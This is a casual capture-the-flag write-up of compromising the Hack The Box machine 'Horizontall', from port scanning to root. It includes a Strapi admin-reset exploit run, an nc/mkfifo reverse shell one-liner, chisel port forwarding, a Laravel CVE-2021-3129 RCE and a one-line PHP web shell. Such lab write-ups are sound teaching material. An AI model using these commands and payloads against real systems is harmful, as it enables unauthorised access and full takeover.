We always start with an nmap scan…..
nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Thu Dec 30 08:30:37 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.10.11.105
Warning: 10.10.11.105 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.11.105 from 320 to 640 due to 570 out of 1899 dropped probes since last increase.
Increasing send delay for 10.10.11.105 from 640 to 1000 due to 1398 out of 4658 dropped probes since last increase.
Nmap scan report for 10.10.11.105
Host is up (0.24s latency).
Not shown: 52107 closed ports, 13426 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Dec 30 08:31:48 2021 -- 1 IP address (1 host up) scanned in 70.64 seconds
Interesting two open ports let throw some service detection and scripts switch on it to confirm what we have running on it we can already see it SSH and HTTP but let keep it flashy lol.
nmap -sC -sV -oA nmap/normal -p 22,80 IP
# Nmap 7.91 scan initiated Thu Dec 30 08:32:40 2021 as: nmap -sC -sV -oA nmap/normal -p 22,80 10.10.11.105
Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: horizontall
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 30 08:32:58 2021 -- 1 IP address (1 host up) scanned in 18.10 seconds
Now that is more flashy we are checking the HTTP first make sure to add IP and horizontall.htb to your host file.
Now next thing to do is to check the source page but we got nothing let burst some directories and subdomain to find some hidden page.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh -o gobuster.req
/index.html (Status: 200) [Size: 901]
/img (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]
But i got nothing on the domain let check subdomain.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
Boom we got a subdomain which is cool add again to our host file now let access it to see what in store for us.
We got a welcome message and the rest is blank so i try adding /admin and the back of the subdomain you can also burst directories you will get it i just guess it and boom it work.
Seems we are dealing with strapi cms using some default credentials and we got no luck let see what we can find on google.
http://api-prod.horizontall.htb/admin/strapiVersion
We found the version let confirm if the version is vulnerable.
Boom let download the exploit to try it out.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQxMzAxNDYxLCJleHAiOjE2NDM4OTM0NjF9.50jv0hWWZ3KBCn-U0EIA2qNHkE7e4ddOrksf0yQuzbI
$>
We are in but when i try to run a command i got some error.
Smooth let try to transfer the shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Ncat ready to catch the reverse shell.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ nc -nvlp 1337
listening on [any] 1337 ...
Boom more better let spawn a full tty shell.
Now let get the user.txt first.
Boom now let try to move our privilege.
Found a credentials but when i try to use it for the user developer i got no luck so let check for SUID .
Nothing also let check what ports we have running locally with us.
ss -tulpn
Boom we have a port let try to port forward using chisel first of all we need to transfer a copy of chisel binary to the target.
Now let start the server on our attacking machine.
./chisel server -p 9000 --reverse &
Now on the target.
./chisel client 10.10.14.7:9000 R:9001:127.0.0.1:8000 &
We are ready to access it now.
127.0.0.1:9001
Boom we found a Laravel v8 (PHP v7.4.18) version seems cool let confirm if it vulnerable.
Boom jackpot let give it a shot.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105/CVE-2021-3129]
└─$ python3 exploit.py
[*] Try to use monolog_rce1 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)
[*] Try to use monolog_rce2 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)
[*] Try to use monolog_rce3 for exploitation.
[*] Result:
[-] RCE echo is not found.
Exploit working now let try to get a reverse shell let edit the exploit to wget our shell file to the server.
//Save in shell.php//
<?php system ($_GET['cmd']); ?>
Now let start our python server.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Now let save and run the exploit again.
Which confirm our file has been transfered let confirm it.
Flashy right hehehehehe let get a reverse shell back to our terminal now.
Bruhhhhhhhh you just got yourself a root you are l33t and thanks for reading my writeup between peace out.
Greeting From Muzec